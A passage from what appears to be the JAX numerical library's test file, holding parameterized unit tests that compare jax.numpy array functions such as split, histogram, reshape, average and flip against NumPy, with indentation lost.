prepend = prepend.astype(np.float32)
if append is None:
append = np._NoValue
elif not np.isscalar(append) and append.dtype == jnp.bfloat16:
append = append.astype(np.float32)
if x.dtype == jnp.bfloat16:
return np.diff(x.astype(np.float32), n=n, axis=axis, prepend=prepend, append=append).astype(jnp.bfloat16)
else:
return np.diff(x, n=n, axis=axis, prepend=prepend, append=append)
jnp_fun = lambda x: jnp.diff(x, n=n, axis=axis, prepend=prepend, append=append)
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker, check_dtypes=False)
self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(
jtu.cases_from_list(
{"testcase_name": ("_op={}_shape={}_dtype={}").format(op, shape, dtype),
"np_op": getattr(np, op), "jnp_op": getattr(jnp, op),
"shape": shape, "dtype": dtype}
for op in ["zeros", "ones"]
for shape in [2, (), (2,), (3, 0), np.array((4, 5, 6), dtype=np.int32),
np.array(4, dtype=np.int32)]
for dtype in all_dtypes))
def testZerosOnes(self, np_op, jnp_op, shape, dtype):
args_maker = lambda: []
np_op = partial(np_op, shape, dtype)
jnp_op = partial(jnp_op, shape, dtype)
self._CheckAgainstNumpy(np_op, jnp_op, args_maker)
self._CompileAndCheck(jnp_op, args_maker)
def testOnesWithInvalidShape(self):
with self.assertRaises(TypeError):
jnp.ones((-1, 1))
@parameterized.named_parameters(jtu.named_cases_from_sampler(lambda s: ({
"testcase_name": "_inshape={}_filldtype={}_fillshape={}_outdtype={}_outshape={}".format(
jtu.format_shape_dtype_string(shape, in_dtype),
np.dtype(fill_value_dtype).name, fill_value_shape,
np.dtype(out_dtype).name, out_shape),
"shape": shape, "in_dtype": in_dtype,
"fill_value_dtype": fill_value_dtype, "fill_value_shape": fill_value_shape,
"out_dtype": out_dtype, "out_shape": out_shape
} for shape in s(array_shapes)
for out_shape in s([None] + array_shapes)
for in_dtype in s(default_dtypes)
for fill_value_dtype in s(default_dtypes)
for fill_value_shape in s(_compatible_shapes(shape if out_shape is None else out_shape))
for out_dtype in s(default_dtypes))))
def testFullLike(self, shape, in_dtype, fill_value_dtype, fill_value_shape, out_dtype, out_shape):
if numpy_version < (1, 19) and out_shape == ():
raise SkipTest("Numpy < 1.19 treats out_shape=() like out_shape=None")
rng = jtu.rand_default(self.rng())
np_fun = lambda x, fill_value: np.full_like(
x, fill_value, dtype=out_dtype, shape=out_shape)
jnp_fun = lambda x, fill_value: jnp.full_like(
x, fill_value, dtype=out_dtype, shape=out_shape)
args_maker = lambda: [rng(shape, in_dtype), rng(fill_value_shape, fill_value_dtype)]
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_func={}_inshape={}_outshape={}_outdtype={}".format(
func, jtu.format_shape_dtype_string(shape, in_dtype),
out_shape, out_dtype),
"func": func, "shape": shape, "in_dtype": in_dtype,
"out_shape": out_shape, "out_dtype": out_dtype}
for shape in array_shapes
for out_shape in [None] + array_shapes
for in_dtype in default_dtypes
for func in ["ones_like", "zeros_like"]
for out_dtype in default_dtypes))
def testZerosOnesLike(self, func, shape, in_dtype, out_shape, out_dtype):
if numpy_version < (1, 19) and out_shape == ():
raise SkipTest("Numpy < 1.19 treats out_shape=() like out_shape=None")
rng = jtu.rand_default(self.rng())
np_fun = lambda x: getattr(np, func)(x, dtype=out_dtype, shape=out_shape)
jnp_fun = lambda x: getattr(jnp, func)(x, dtype=out_dtype, shape=out_shape)
args_maker = lambda: [rng(shape, in_dtype)]
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_func={}_inshape={}_weak_type={}_outshape={}_outdtype={}".format(
func, jtu.format_shape_dtype_string(shape, in_dtype),
weak_type, out_shape, out_dtype),
"func": func, "args": args,
"shape": shape, "in_dtype": in_dtype, "weak_type": weak_type,
"out_shape": out_shape, "out_dtype": out_dtype}
for shape in array_shapes
for in_dtype in [np.int32, np.float32, np.complex64]
for weak_type in [True, False]
for out_shape in [None, (), (10,)]
for func, args in [("full_like", (-100,)), ("ones_like", ()), ("zeros_like", ())]
for out_dtype in [None, float]))
def testZerosOnesFullLikeWeakType(self, func, args, shape, in_dtype, weak_type, out_shape, out_dtype):
if numpy_version < (1, 19) and out_shape == ():
raise SkipTest("Numpy < 1.19 treats out_shape=() like out_shape=None")
rng = jtu.rand_default(self.rng())
x = lax._convert_element_type(rng(shape, in_dtype), weak_type=weak_type)
fun = lambda x: getattr(jnp, func)(x, *args, dtype=out_dtype, shape=out_shape)
expected_weak_type = weak_type and (out_dtype is None)
self.assertEqual(dtypes.is_weakly_typed(fun(x)), expected_weak_type)
self.assertEqual(dtypes.is_weakly_typed(api.jit(fun)(x)), expected_weak_type)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_funcname={}_input_type={}_val={}_dtype={}".format(
funcname, input_type, val, dtype),
"funcname": funcname, "input_type": input_type, "val": val, "dtype": dtype}
for funcname in ["array", "asarray"]
for dtype in [int, float, None]
for val in [0, 1]
for input_type in [int, float, np.int32, np.float32]))
def testArrayWeakType(self, funcname, input_type, val, dtype):
func = lambda x: getattr(jnp, funcname)(x, dtype=dtype)
fjit = api.jit(func)
val = input_type(val)
expected_weak_type = dtype is None and input_type in set(dtypes._weak_types)
self.assertEqual(dtypes.is_weakly_typed(func(val)), expected_weak_type)
self.assertEqual(dtypes.is_weakly_typed(fjit(val)), expected_weak_type)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_{}_weak_type={}_slc={}".format(
jtu.format_shape_dtype_string(shape, dtype), weak_type, slc),
"shape": shape, "dtype": dtype, "weak_type": weak_type, "slc": slc}
for shape in nonempty_nonscalar_array_shapes
for dtype in [int, float, complex]
for weak_type in [True, False]
for slc in [slice(None), slice(0), slice(3), 0, ...]))
def testSliceWeakTypes(self, shape, dtype, weak_type, slc):
rng = jtu.rand_default(self.rng())
x = lax._convert_element_type(rng(shape, dtype), weak_type=weak_type)
op = lambda x: x[slc]
self.assertEqual(op(x).aval.weak_type, weak_type)
self.assertEqual(api.jit(op)(x).aval.weak_type, weak_type)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_{}_axis={}_{}sections".format(
jtu.format_shape_dtype_string(shape, dtype), axis, num_sections),
"shape": shape, "num_sections": num_sections, "axis": axis,
"dtype": dtype}
for shape, axis, num_sections in [
((3,), 0, 3), ((12,), 0, 3), ((12, 4), 0, 4), ((12, 4), 1, 2),
((2, 3, 4), -1, 2), ((2, 3, 4), -2, 3)]
for dtype in default_dtypes))
def testSplitStaticInt(self, shape, num_sections, axis, dtype):
rng = jtu.rand_default(self.rng())
np_fun = lambda x: np.split(x, num_sections, axis=axis)
jnp_fun = lambda x: jnp.split(x, num_sections, axis=axis)
args_maker = lambda: [rng(shape, dtype)]
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_{}_axis={}_{}sections".format(
jtu.format_shape_dtype_string(shape, dtype), axis, num_sections),
"shape": shape, "num_sections": num_sections, "axis": axis, "dtype": dtype}
# All testcases split the specified axis unequally
for shape, axis, num_sections in [
((3,), 0, 2), ((12,), 0, 5), ((12, 4), 0, 7), ((12, 4), 1, 3),
((2, 3, 5), -1, 2), ((2, 4, 4), -2, 3), ((7, 2, 2), 0, 3)]
for dtype in default_dtypes))
def testArraySplitStaticInt(self, shape, num_sections, axis, dtype):
rng = jtu.rand_default(self.rng())
np_fun = lambda x: np.array_split(x, num_sections, axis=axis)
jnp_fun = lambda x: jnp.array_split(x, num_sections, axis=axis)
args_maker = lambda: [rng(shape, dtype)]
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
self._CompileAndCheck(jnp_fun, args_maker)
def testSplitTypeError(self):
# If we pass an ndarray for indices_or_sections -> no error
self.assertEqual(3, len(jnp.split(jnp.zeros(3), jnp.array([1, 2]))))
CONCRETIZATION_MSG = "Abstract tracer value encountered where concrete value is expected."
with self.assertRaisesRegex(TypeError, CONCRETIZATION_MSG):
# An abstract tracer for idx
api.jit(lambda idx: jnp.split(jnp.zeros((12, 2)), idx))(2.)
with self.assertRaisesRegex(TypeError, CONCRETIZATION_MSG):
# A list including an abstract tracer
api.jit(lambda idx: jnp.split(jnp.zeros((12, 2)), [2, idx]))(2.)
# A concrete tracer -> no error
api.jvp(lambda idx: jnp.split(jnp.zeros((12, 2)), idx),
(2.,), (1.,))
# A tuple including a concrete tracer -> no error
api.jvp(lambda idx: jnp.split(jnp.zeros((12, 2)), (1, idx)),
(2.,), (1.,))
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_{}_bins={}_range={}_weights={}".format(
jtu.format_shape_dtype_string(shape, dtype), bins, range, weights),
"shape": shape,
"dtype": dtype,
"bins": bins,
"range": range,
"weights": weights,
}
for shape in [(5,), (5, 5)]
for dtype in number_dtypes
for bins in [10, np.arange(-5, 6), [-5, 0, 3]]
for range in [None, (0, 0), (0, 10)]
for weights in [True, False]
))
def testHistogramBinEdges(self, shape, dtype, bins, range, weights):
rng = jtu.rand_default(self.rng())
_weights = lambda w: abs(w) if weights else None
np_fun = lambda a, w, r: np.histogram_bin_edges(a, bins=bins, range=r,
weights=_weights(w))
jnp_fun = lambda a, w, r: jnp.histogram_bin_edges(a, bins=bins, range=r,
weights=_weights(w))
args_maker = lambda: [rng(shape, dtype), rng(shape, dtype), range]
tol = {jnp.bfloat16: 2E-2, np.float16: 1E-2}
# linspace() compares poorly to numpy when using bfloat16
if dtype != jnp.bfloat16:
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker, check_dtypes=False, tol=tol)
self._CompileAndCheck(jnp_fun, args_maker,
atol=tol, rtol=tol)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_{}_bins={}_density={}_weights={}".format(
jtu.format_shape_dtype_string(shape, dtype), bins, density, weights),
"shape": shape,
"dtype": dtype,
"bins": bins,
"density": density,
"weights": weights,
}
for shape in [(5,), (5, 5)]
for dtype in default_dtypes
# We only test explicit integer-valued bin edges because in other cases
# rounding errors lead to flaky tests.
for bins in [np.arange(-5, 6), [-5, 0, 3]]
for density in [True, False]
for weights in [True, False]
))
def testHistogram(self, shape, dtype, bins, density, weights):
rng = jtu.rand_default(self.rng())
_weights = lambda w: abs(w) if weights else None
np_fun = lambda a, w: np.histogram(a, bins=bins, density=density,
weights=_weights(w))
jnp_fun = lambda a, w: jnp.histogram(a, bins=bins, density=density,
weights=_weights(w))
args_maker = lambda: [rng(shape, dtype), rng(shape, dtype)]
tol = {jnp.bfloat16: 2E-2, np.float16: 1E-1}
# np.searchsorted errors on bfloat16 with
# "TypeError: invalid type promotion with custom data type"
if dtype != jnp.bfloat16:
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker, check_dtypes=False,
tol=tol)
self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_{}_bins={}_weights={}_density={}".format(
jtu.format_shape_dtype_string(shape, dtype), bins, weights, density),
"shape": shape,
"dtype": dtype,
"bins": bins,
"weights": weights,
"density": density
}
for shape in [(5,), (12,)]
for dtype in int_dtypes
for bins in [2, [2, 2], [[0, 1, 3, 5], [0, 2, 3, 4, 6]]]
for weights in [False, True]
for density in [False, True]
))
def testHistogram2d(self, shape, dtype, bins, weights, density):
rng = jtu.rand_default(self.rng())
_weights = lambda w: abs(w) if weights else None
np_fun = lambda a, b, w: np.histogram2d(a, b, bins=bins, weights=_weights(w), density=density)
jnp_fun = lambda a, b, w: jnp.histogram2d(a, b, bins=bins, weights=_weights(w), density=density)
args_maker = lambda: [rng(shape, dtype), rng(shape, dtype), rng(shape, dtype)]
tol = {jnp.bfloat16: 2E-2, np.float16: 1E-1}
# np.searchsorted errors on bfloat16 with
# "TypeError: invalid type promotion with custom data type"
with np.errstate(divide='ignore', invalid='ignore'):
if dtype != jnp.bfloat16:
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker, check_dtypes=False,
tol=tol)
self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_{}_bins={}_weights={}_density={}".format(
jtu.format_shape_dtype_string(shape, dtype), bins, weights, density),
"shape": shape,
"dtype": dtype,
"bins": bins,
"weights": weights,
"density": density
}
for shape in [(5, 3), (10, 3)]
for dtype in int_dtypes
for bins in [(2, 2, 2), [[-5, 0, 4], [-4, -1, 2], [-6, -1, 4]]]
for weights in [False, True]
for density in [False, True]
))
def testHistogramdd(self, shape, dtype, bins, weights, density):
rng = jtu.rand_default(self.rng())
_weights = lambda w: abs(w) if weights else None
np_fun = lambda a, w: np.histogramdd(a, bins=bins, weights=_weights(w), density=density)
jnp_fun = lambda a, w: jnp.histogramdd(a, bins=bins, weights=_weights(w), density=density)
args_maker = lambda: [rng(shape, dtype), rng((shape[0],), dtype)]
tol = {jnp.bfloat16: 2E-2, np.float16: 1E-1}
# np.searchsorted errors on bfloat16 with
# "TypeError: invalid type promotion with custom data type"
if dtype != jnp.bfloat16:
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker, check_dtypes=False,
tol=tol)
self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_{}_axis={}_{}sections".format(
jtu.format_shape_dtype_string(shape, dtype), axis, num_sections),
"shape": shape, "num_sections": num_sections, "axis": axis,
"dtype": dtype}
for shape, axis, num_sections in [
((12, 4), 0, 4), ((12, 4), 1, 2),
((2, 3, 4), 2, 2), ((4, 3, 4), 0, 2)]
for dtype in default_dtypes))
def testHVDSplit(self, shape, num_sections, axis, dtype):
rng = jtu.rand_default(self.rng())
def fn(module, axis):
if axis == 0:
return module.vsplit
elif axis == 1:
return module.hsplit
else:
assert axis == 2
return module.dsplit
np_fun = lambda x: fn(np, axis)(x, num_sections)
jnp_fun = lambda x: fn(jnp, axis)(x, num_sections)
args_maker = lambda: [rng(shape, dtype)]
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_inshape={}_outshape={}_order={}".format(
jtu.format_shape_dtype_string(arg_shape, dtype),
jtu.format_shape_dtype_string(out_shape, dtype),
order),
"arg_shape": arg_shape, "out_shape": out_shape, "dtype": dtype,
"order": order}
for dtype in default_dtypes
for order in ["C", "F"]
for arg_shape, out_shape in [
(jtu.NUMPY_SCALAR_SHAPE, (1, 1, 1)),
((), (1, 1, 1)),
((7, 0), (0, 42, 101)),
((3, 4), 12),
((3, 4), (12,)),
((3, 4), -1),
((2, 1, 4), (-1,)),
((2, 2, 4), (2, 8))
]))
def testReshape(self, arg_shape, out_shape, dtype, order):
rng = jtu.rand_default(self.rng())
np_fun = lambda x: np.reshape(x, out_shape, order=order)
jnp_fun = lambda x: jnp.reshape(x, out_shape, order=order)
args_maker = lambda: [rng(arg_shape, dtype)]
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_inshape={}_outshape={}".format(
jtu.format_shape_dtype_string(arg_shape, dtype),
jtu.format_shape_dtype_string(out_shape, dtype)),
"arg_shape": arg_shape, "out_shape": out_shape, "dtype": dtype}
for dtype in default_dtypes
for arg_shape, out_shape in [
((7, 0), (0, 42, 101)),
((2, 1, 4), (-1,)),
((2, 2, 4), (2, 8))
]))
def testReshapeMethod(self, arg_shape, out_shape, dtype):
rng = jtu.rand_default(self.rng())
np_fun = lambda x: np.reshape(x, out_shape)
jnp_fun = lambda x: x.reshape(*out_shape)
args_maker = lambda: [rng(arg_shape, dtype)]
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_inshape={}_outshape={}".format(
jtu.format_shape_dtype_string(arg_shape, dtype),
jtu.format_shape_dtype_string(out_shape, dtype)),
"arg_shape": arg_shape, "out_shape": out_shape, "dtype": dtype}
for dtype in default_dtypes
for arg_shape, out_shape in itertools.product(all_shapes, array_shapes)))
def testResize(self, arg_shape, out_shape, dtype):
rng = jtu.rand_default(self.rng())
np_fun = lambda x: np.resize(x, out_shape)
jnp_fun = lambda x: jnp.resize(x, out_shape)
args_maker = lambda: [rng(arg_shape, dtype)]
if len(out_shape) > 0 or numpy_version >= (1, 20, 0):
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_inshape={}_expanddim={!r}".format(
jtu.format_shape_dtype_string(arg_shape, dtype), dim),
"arg_shape": arg_shape, "dtype": dtype, "dim": dim}
for arg_shape in [(), (3,), (3, 4)]
for dtype in default_dtypes
for dim in (list(range(-len(arg_shape)+1, len(arg_shape)))
+ [np.array(0), np.array(-1), (0,), [np.array(0)],
(len(arg_shape), len(arg_shape) + 1)])))
def testExpandDimsStaticDim(self, arg_shape, dtype, dim):
rng = jtu.rand_default(self.rng())
np_fun = lambda x: np.expand_dims(x, dim)
jnp_fun = lambda x: jnp.expand_dims(x, dim)
args_maker = lambda: [rng(arg_shape, dtype)]
self._CompileAndCheck(jnp_fun, args_maker)
if isinstance(dim, (tuple, list)) and numpy_version < (1, 18, 0):
raise SkipTest("support for multiple axes added in NumPy 1.18.0")
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_inshape={}_axes=({},{})".format(
jtu.format_shape_dtype_string(arg_shape, dtype), ax1, ax2),
"arg_shape": arg_shape, "dtype": dtype, "ax1": ax1, "ax2": ax2}
for arg_shape, ax1, ax2 in [
((3, 4), 0, 1), ((3, 4), 1, 0), ((3, 4, 5), 1, 2),
((3, 4, 5), -1, -2), ((3, 4, 5), 0, 1)]
for dtype in default_dtypes))
def testSwapAxesStaticAxes(self, arg_shape, dtype, ax1, ax2):
rng = jtu.rand_default(self.rng())
np_fun = lambda x: np.swapaxes(x, ax1, ax2)
jnp_fun = lambda x: jnp.swapaxes(x, ax1, ax2)
args_maker = lambda: [rng(arg_shape, dtype)]
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_inshape={}_axis={!r}".format(
jtu.format_shape_dtype_string(arg_shape, dtype), ax),
"arg_shape": arg_shape, "dtype": dtype, "ax": ax}
for arg_shape, ax in [
((3, 1), None),
((3, 1), 1),
((3, 1), -1),
((3, 1), np.array(1)),
((1, 3, 1), (0, 2)),
((1, 3, 1), (0,)),
((1, 4, 1), (np.array(0),))]
for dtype in default_dtypes))
def testSqueeze(self, arg_shape, dtype, ax):
rng = jtu.rand_default(self.rng())
np_fun = lambda x: np.squeeze(x, ax)
jnp_fun = lambda x: jnp.squeeze(x, ax)
args_maker = lambda: [rng(arg_shape, dtype)]
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_shape={}_axis={}_weights={}_returned={}".format(
jtu.format_shape_dtype_string(shape, dtype),
axis,
(None if weights_shape is None else jtu.format_shape_dtype_string(weights_shape, dtype)),
returned),
"shape": shape, "dtype": dtype, "axis": axis,
"weights_shape": weights_shape, "returned": returned}
for shape, dtype in _shape_and_dtypes(nonempty_shapes, number_dtypes)
for axis in list(range(-len(shape), len(shape))) + [None]
# `weights_shape` is either `None`, same as the averaged axis, or same as
# that of the input
for weights_shape in ([None, shape] if axis is None or len(shape) == 1
else [None, (shape[axis],), shape])
for returned in [False, True]))
def testAverage(self, shape, dtype, axis, weights_shape, returned):
rng = jtu.rand_default(self.rng())
if weights_shape is None:
np_fun = lambda x: np.average(x, axis, returned=returned)
jnp_fun = lambda x: jnp.average(x, axis, returned=returned)
args_maker = lambda: [rng(shape, dtype)]
else:
np_fun = lambda x, weights: np.average(x, axis, weights, returned)
jnp_fun = lambda x, weights: jnp.average(x, axis, weights, returned)
args_maker = lambda: [rng(shape, dtype), rng(weights_shape, dtype)]
np_fun = _promote_like_jnp(np_fun, inexact=True)
tol = {dtypes.bfloat16: 2e-1, np.float16: 1e-2, np.float32: 1e-5,
np.float64: 1e-12, np.complex64: 1e-5}
check_dtypes = shape is not jtu.PYTHON_SCALAR_SHAPE
try:
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker,
check_dtypes=check_dtypes, tol=tol)
except ZeroDivisionError:
self.skipTest("don't support checking for ZeroDivisionError")
self._CompileAndCheck(jnp_fun, args_maker, check_dtypes=check_dtypes,
rtol=tol, atol=tol)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name":
f"_arg{i}_ndmin={ndmin}_dtype={np.dtype(dtype) if dtype else None}",
"arg": arg, "ndmin": ndmin, "dtype": dtype}
for i, (arg, dtypes) in enumerate([
([True, False, True], all_dtypes),
(3., all_dtypes),
([1, 2, 3], all_dtypes),
(np.array([1, 2, 3], dtype=np.int64), all_dtypes),
([1., 2., 3.], all_dtypes),
([[1, 2], [3, 4], [5, 6]], all_dtypes),
([[1, 2.], [3, 4], [5, 6]], all_dtypes),
([[1., 2j], [3., 4.], [5., 6.]], complex_dtypes),
([[3, np.array(2, dtype=jnp.float_), 1],
np.arange(3., dtype=jnp.float_)], all_dtypes),
])
for dtype in [None] + dtypes
for ndmin in [None, np.ndim(arg), np.ndim(arg) + 1, np.ndim(arg) + 2]))
def testArray(self, arg, ndmin, dtype):
args_maker = lambda: [arg]
canonical_dtype = dtypes.canonicalize_dtype(dtype or np.array(arg).dtype)
if ndmin is not None:
np_fun = partial(np.array, ndmin=ndmin, dtype=canonical_dtype)
jnp_fun = partial(jnp.array, ndmin=ndmin, dtype=dtype)
else:
np_fun = partial(np.array, dtype=canonical_dtype)
jnp_fun = partial(jnp.array, dtype=dtype)
# We are testing correct canonicalization behavior here, so we turn off the
# permissive canonicalization logic in the test harness.
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker,
canonicalize_dtypes=False)
self._CompileAndCheck(jnp_fun, args_maker)
def testArrayUnsupportedDtypeError(self):
with self.assertRaisesRegex(TypeError,
"JAX only supports number and bool dtypes.*"):
jnp.array(3, [('a','<i4'),('b','<i4')])
def testArrayFromInteger(self):
int_dtype = dtypes.canonicalize_dtype(jnp.int64)
int_max = jnp.iinfo(int_dtype).max
int_min = jnp.iinfo(int_dtype).min
# Values at extremes are converted correctly.
for val in [int_min, 0, int_max]:
self.assertEqual(jnp.array(val).dtype, int_dtype)
# out of bounds leads to an OverflowError
val = int_max + 1
with self.assertRaisesRegex(OverflowError, f"Python int {val} too large to convert to {int_dtype.name}"):
jnp.array(val)
# explicit uint64 should work
if config.x64_enabled:
self.assertEqual(np.uint64(val), jnp.array(val, dtype='uint64'))
# TODO(jakevdp): fix list inputs to jnp.array and enable the following test
# def testArrayFromList(self):
# int_max = jnp.iinfo(jnp.int64).max
# int_min = jnp.iinfo(jnp.int64).min
#
# # Values at extremes are converted correctly.
# for val in [int_min, 0, int_max]:
# self.assertEqual(jnp.array([val]).dtype, dtypes.canonicalize_dtype('int64'))
#
# # list of values results in promoted type.
# self.assertEqual(jnp.array([0, np.float16(1)]).dtype, jnp.result_type('int64', 'float16'))
#
# # out of bounds leads to an OverflowError
# val = int_min - 1
# with self.assertRaisesRegex(OverflowError, f"Python int {val} too large to convert to int64"):
# jnp.array([0, val])
def testIssue121(self):
assert not np.isscalar(jnp.array(3))
def testArrayOutputsDeviceArrays(self):
assert xla.type_is_device_array(jnp.array([]))
assert xla.type_is_device_array(jnp.array(np.array([])))
class NDArrayLike:
def __array__(self, dtype=None):
return np.array([], dtype=dtype)
assert xla.type_is_device_array(jnp.array(NDArrayLike()))
# NOTE(mattjj): disabled b/c __array__ must produce ndarrays
# class DeviceArrayLike:
# def __array__(self, dtype=None):
# return jnp.array([], dtype=dtype)
# assert xla.type_is_device_array(jnp.array(DeviceArrayLike()))
def testArrayMethod(self):
class arraylike(object):
dtype = np.float32
def __array__(self, dtype=None):
return np.array(3., dtype=dtype)
a = arraylike()
ans = jnp.array(a)
assert ans == 3.
def testMemoryView(self):
ans = jnp.array(bytearray(b'\x2a'))
self.assertAllClose(
ans,
np.array([0x2a], dtype=np.uint8))
def testIsClose(self):
c_isclose = api.jit(jnp.isclose)
c_isclose_nan = api.jit(partial(jnp.isclose, equal_nan=True))
n = 2
rng = np.random.RandomState(0)
x = rng.randn(n, 1)
y = rng.randn(n, 1)
inf = np.asarray(n * [np.inf]).reshape([n, 1])
nan = np.asarray(n * [np.nan]).reshape([n, 1])
args = [x, y, inf, -inf, nan]
for arg0 in args:
for arg1 in args:
result_np = np.isclose(arg0, arg1)
result_jax = jnp.isclose(arg0, arg1)
result_jit = c_isclose(arg0, arg1)
self.assertTrue(jnp.all(jnp.equal(result_np, result_jax)))
self.assertTrue(jnp.all(jnp.equal(result_np, result_jit)))
result_np = np.isclose(arg0, arg1, equal_nan=True)
result_jax = jnp.isclose(arg0, arg1, equal_nan=True)
result_jit = c_isclose_nan(arg0, arg1)
self.assertTrue(jnp.all(jnp.equal(result_np, result_jax)))
self.assertTrue(jnp.all(jnp.equal(result_np, result_jit)))
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_x={}_y={}_equal_nan={}".format(x, y, equal_nan),
"x": x, "y": y, "equal_nan": equal_nan}
for x, y in itertools.product([
1, [1], [1, 1 + 1E-4], [1, np.nan]], repeat=2)
for equal_nan in [True, False]))
def testAllClose(self, x, y, equal_nan):
jnp_fun = partial(jnp.allclose, equal_nan=equal_nan, rtol=1E-3)
np_fun = partial(np.allclose, equal_nan=equal_nan, rtol=1E-3)
args_maker = lambda: [x, y]
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
self._CompileAndCheck(jnp_fun, args_maker)
def testZeroStridesConstantHandler(self):
raw_const = np.random.RandomState(0).randn(1, 2, 1, 1, 5, 1)
const = np.broadcast_to(raw_const, (3, 2, 3, 4, 5, 6))
def fun(x):
return x * const
fun = api.jit(fun)
out_val = fun(3.)
self.assertAllClose(out_val, 3. * const, check_dtypes=False)
def testIsInstanceNdarrayDuringTracing(self):
arr = np.ones(3)
@api.jit
def f(x):
self.assertIsInstance(x, jnp.ndarray)
return jnp.sum(x)
f(arr)
def testNonArrayErrorMessage(self):
x = [1., 2.]
y = np.array([3., 4.])
def g(x, y):
return jnp.add(x, y)
def f(x, y):
return jnp.dot(x, y)
self.assertRaises(TypeError, lambda: g(x, y))
self.assertRaises(TypeError, lambda: f(x, y))
self.assertRaises(TypeError, lambda: api.jit(g)(x, y))
self.assertRaises(TypeError, lambda: api.jit(f)(x, y))
def testAbstractionErrorMessage(self):
@api.jit
def f(x, n):
for _ in range(n):
x = x * x
return x
self.assertRaises(jax.errors.TracerIntegerConversionError, lambda: f(3., 3))
@api.jit
def g(x):
if x > 0.:
return x * 2
else:
return x + 2
self.assertRaises(jax.errors.ConcretizationTypeError, lambda: g(3.))
def testTracingPrimitiveWithNoTranslationErrorMessage(self):
# TODO(mattjj): update this for jax3
self.skipTest("test needs jax3 update")
foo = jnp._not_implemented(lambda x: x)
# No error if there's no tracing.
foo(np.arange(3))
cfoo = api.jit(foo)
self.assertRaises(NotImplementedError, lambda: cfoo(np.arange(3)))
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_{}_axis={}".format(
jtu.format_shape_dtype_string(shape, dtype), axis),
"shape": shape, "dtype": dtype, "axis": axis}
for shape in [(3,), (2, 3)]
for dtype in default_dtypes
for axis in list(range(-len(shape), len(shape))) + [None] + [tuple(range(len(shape)))] # Test negative axes and tuples
))
def testFlip(self, shape, dtype, axis):
rng = jtu.rand_default(self.rng())
args_maker = self._GetArgsMaker(rng, [shape], [dtype])
jnp_op = lambda x: jnp.flip(x, axis)
np_op = lambda x: np.flip(x, axis)
self._CheckAgainstNumpy(np_op, jnp_op, args_maker)
self._CompileAndCheck(jnp_op, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_{}".format(
jtu.format_shape_dtype_string(shape, dtype)),
"shape": shape, "dtype": dtype}
for shape in [(3,), (2, 3), (3, 2, 4)]
for dtype in default_dtypes))
def testFlipud(self, shape, dtype):
rng = jtu.rand_default(self.rng())
args_maker = self._GetArgsMaker(rng, [shape], [dtype])
jnp_op = lambda x: jnp.flipud(x)
np_op = lambda x: np.flipud(x)
self._CheckAgainstNumpy(np_op, jnp_op, args_maker)
self._CompileAndCheck(jnp_op, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_{}".format(
jtu.format_shape_dtype_string(shape, dtype)),
"shape": shape, "dtype": dtype}
for shape in [(3, 2), (2, 3), (3, 2, 4)]
for dtype in default_dtypes))
def testFliplr(self, shape, dtype):
rng = jtu.rand_default(self.rng())
args_maker = self._GetArgsMaker(rng, [shape], [dtype])
jnp_op = lambda x: jnp.fliplr(x)
np_op = lambda x: np.fliplr(x)
self._CheckAgainstNumpy(np_op, jnp_op, args_maker)
self._CompileAndCheck(jnp_op, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_{}_k={}_axes={}".format(
jtu.format_shape_dtype_string(shape, dtype), k, axes),
"shape": shape, "dtype": dtype, "k": k, "axes": axes}
for shape, axes in [
[(2, 3), (0, 1)],
